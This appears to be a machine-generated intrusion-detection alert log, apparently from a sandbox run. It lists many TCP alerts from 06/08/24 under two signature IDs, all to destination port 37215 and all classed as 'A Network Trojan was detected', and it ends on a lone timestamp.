          Timestamp:06/08/24-15:05:38.798028
          SID:2835222
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115956
          SID:2835222
          Source Port:58896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887040
          SID:2829579
          Source Port:58294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353393
          SID:2835222
          Source Port:35634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509514
          SID:2829579
          Source Port:56358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859552
          SID:2835222
          Source Port:49316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020888
          SID:2829579
          Source Port:57290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175679
          SID:2829579
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407854
          SID:2829579
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263813
          SID:2829579
          Source Port:46418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449230
          SID:2829579
          Source Port:33048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351646
          SID:2835222
          Source Port:36628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294834
          SID:2835222
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351281
          SID:2835222
          Source Port:57814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834487
          SID:2829579
          Source Port:34840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259019
          SID:2829579
          Source Port:47036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180971
          SID:2835222
          Source Port:42390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448417
          SID:2835222
          Source Port:40822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462586
          SID:2829579
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240542
          SID:2835222
          Source Port:54332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263672
          SID:2835222
          Source Port:55398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350807
          SID:2835222
          Source Port:58156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184629
          SID:2829579
          Source Port:49520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159698
          SID:2829579
          Source Port:43126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895802
          SID:2829579
          Source Port:59418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191900
          SID:2829579
          Source Port:34226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731245
          SID:2829579
          Source Port:58802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.603012
          SID:2835222
          Source Port:58332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602981
          SID:2835222
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912957
          SID:2835222
          Source Port:45854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707793
          SID:2829579
          Source Port:52762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744132
          SID:2835222
          Source Port:40400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744705
          SID:2829579
          Source Port:57488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108106
          SID:2835222
          Source Port:47906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441950
          SID:2829579
          Source Port:53560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040528
          SID:2835222
          Source Port:57706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160512
          SID:2835222
          Source Port:53306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857946
          SID:2829579
          Source Port:53120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159741
          SID:2829579
          Source Port:36680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671168
          SID:2835222
          Source Port:55474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175445
          SID:2835222
          Source Port:35722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892435
          SID:2829579
          Source Port:36996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.603005
          SID:2829579
          Source Port:53826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018273
          SID:2835222
          Source Port:48854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465735
          SID:2835222
          Source Port:57338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511591
          SID:2829579
          Source Port:45060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670086
          SID:2835222
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551998
          SID:2829579
          Source Port:34006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843683
          SID:2829579
          Source Port:56926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.847162
          SID:2829579
          Source Port:49742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160295
          SID:2835222
          Source Port:45946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153447
          SID:2835222
          Source Port:36426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355874
          SID:2835222
          Source Port:45292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861891
          SID:2835222
          Source Port:46428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107506
          SID:2829579
          Source Port:59584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178646
          SID:2829579
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462397
          SID:2835222
          Source Port:58394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259612
          SID:2829579
          Source Port:36470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354904
          SID:2835222
          Source Port:47182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817125
          SID:2835222
          Source Port:58150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466271
          SID:2835222
          Source Port:51220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079035
          SID:2835222
          Source Port:42060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067620
          SID:2829579
          Source Port:58242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732957
          SID:2835222
          Source Port:50760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043959
          SID:2829579
          Source Port:60078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808952
          SID:2829579
          Source Port:37374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606048
          SID:2835222
          Source Port:53226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406022
          SID:2829579
          Source Port:46768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888025
          SID:2829579
          Source Port:54290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404686
          SID:2829579
          Source Port:38844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733957
          SID:2835222
          Source Port:40166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445926
          SID:2835222
          Source Port:46202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353337
          SID:2829579
          Source Port:47562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731542
          SID:2835222
          Source Port:44582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172975
          SID:2835222
          Source Port:48904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403143
          SID:2835222
          Source Port:57230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849656
          SID:2829579
          Source Port:53322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266094
          SID:2835222
          Source Port:52502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743046
          SID:2829579
          Source Port:55094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708648
          SID:2835222
          Source Port:35862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272275
          SID:2835222
          Source Port:41642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039140
          SID:2835222
          Source Port:55738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510363
          SID:2835222
          Source Port:44884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806444
          SID:2835222
          Source Port:51504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516726
          SID:2829579
          Source Port:47614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081570
          SID:2835222
          Source Port:52992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183641
          SID:2835222
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174026
          SID:2835222
          Source Port:48184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041285
          SID:2835222
          Source Port:47046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467015
          SID:2835222
          Source Port:46830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178662
          SID:2829579
          Source Port:60454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884094
          SID:2829579
          Source Port:54138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734816
          SID:2829579
          Source Port:60582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352475
          SID:2835222
          Source Port:45026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512623
          SID:2835222
          Source Port:33044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732848
          SID:2835222
          Source Port:52150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240455
          SID:2835222
          Source Port:52102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745603
          SID:2829579
          Source Port:42880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107880
          SID:2835222
          Source Port:40024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108475
          SID:2835222
          Source Port:49356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356058
          SID:2835222
          Source Port:33574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188823
          SID:2829579
          Source Port:45884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466797
          SID:2835222
          Source Port:48934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796306
          SID:2829579
          Source Port:36306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671083
          SID:2829579
          Source Port:50178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404978
          SID:2829579
          Source Port:56914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812901
          SID:2829579
          Source Port:51256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111903
          SID:2829579
          Source Port:57074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816361
          SID:2835222
          Source Port:39430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353706
          SID:2829579
          Source Port:33986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912212
          SID:2835222
          Source Port:43578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071074
          SID:2835222
          Source Port:52828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184041
          SID:2835222
          Source Port:43862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512760
          SID:2829579
          Source Port:53496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815479
          SID:2829579
          Source Port:59312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356186
          SID:2829579
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470725
          SID:2829579
          Source Port:57518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084988
          SID:2835222
          Source Port:56958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035778
          SID:2835222
          Source Port:38176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460234
          SID:2829579
          Source Port:48632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804320
          SID:2829579
          Source Port:48776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353651
          SID:2829579
          Source Port:42170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403132
          SID:2835222
          Source Port:45774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911710
          SID:2835222
          Source Port:43172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264462
          SID:2829579
          Source Port:50278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465617
          SID:2835222
          Source Port:41390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846628
          SID:2835222
          Source Port:49074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262106
          SID:2829579
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177097
          SID:2835222
          Source Port:45036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188133
          SID:2829579
          Source Port:48056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837382
          SID:2829579
          Source Port:43890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175773
          SID:2835222
          Source Port:54470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782884
          SID:2835222
          Source Port:46804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302303
          SID:2835222
          Source Port:43918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056317
          SID:2835222
          Source Port:56234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465880
          SID:2835222
          Source Port:44264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824949
          SID:2829579
          Source Port:58826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817365
          SID:2829579
          Source Port:50550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740001
          SID:2835222
          Source Port:39912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827839
          SID:2829579
          Source Port:39168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747919
          SID:2829579
          Source Port:57876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353749
          SID:2835222
          Source Port:37220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352655
          SID:2835222
          Source Port:40678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842226
          SID:2829579
          Source Port:44900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470512
          SID:2829579
          Source Port:41560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036187
          SID:2835222
          Source Port:37622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466963
          SID:2829579
          Source Port:57348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514175
          SID:2835222
          Source Port:33276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731945
          SID:2835222
          Source Port:44718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512510
          SID:2835222
          Source Port:48202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354300
          SID:2829579
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706224
          SID:2835222
          Source Port:44838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549843
          SID:2829579
          Source Port:46518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152364
          SID:2829579
          Source Port:41562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740451
          SID:2829579
          Source Port:36016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601021
          SID:2835222
          Source Port:40572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175807
          SID:2829579
          Source Port:44324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172787
          SID:2829579
          Source Port:55424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271356
          SID:2835222
          Source Port:36968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352754
          SID:2835222
          Source Port:37628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731683
          SID:2835222
          Source Port:57632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841776
          SID:2829579
          Source Port:46638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601609
          SID:2835222
          Source Port:58628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912012
          SID:2835222
          Source Port:35610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378064
          SID:2835222
          Source Port:35246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743369
          SID:2835222
          Source Port:39770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378414
          SID:2835222
          Source Port:59642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729426
          SID:2835222
          Source Port:48958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469558
          SID:2835222
          Source Port:46822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355759
          SID:2829579
          Source Port:41520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178644
          SID:2829579
          Source Port:35988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731970
          SID:2835222
          Source Port:41248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352378
          SID:2829579
          Source Port:51318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274130
          SID:2835222
          Source Port:49026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732080
          SID:2829579
          Source Port:57842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352961
          SID:2829579
          Source Port:40822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135577
          SID:2829579
          Source Port:40742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176068
          SID:2835222
          Source Port:44314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037121
          SID:2829579
          Source Port:39306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704030
          SID:2829579
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176502
          SID:2835222
          Source Port:37560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233413
          SID:2835222
          Source Port:48190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730722
          SID:2835222
          Source Port:59094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463446
          SID:2829579
          Source Port:49800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271581
          SID:2835222
          Source Port:43524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176519
          SID:2835222
          Source Port:37060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515580
          SID:2829579
          Source Port:40404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236796
          SID:2829579
          Source Port:48146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378468
          SID:2829579
          Source Port:33166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736669
          SID:2835222
          Source Port:34132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834427
          SID:2829579
          Source Port:39624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461301
          SID:2835222
          Source Port:42968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160657
          SID:2835222
          Source Port:53240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895570
          SID:2829579
          Source Port:34428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742355
          SID:2829579
          Source Port:56876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554738
          SID:2829579
          Source Port:50386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794175
          SID:2829579
          Source Port:53528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890606
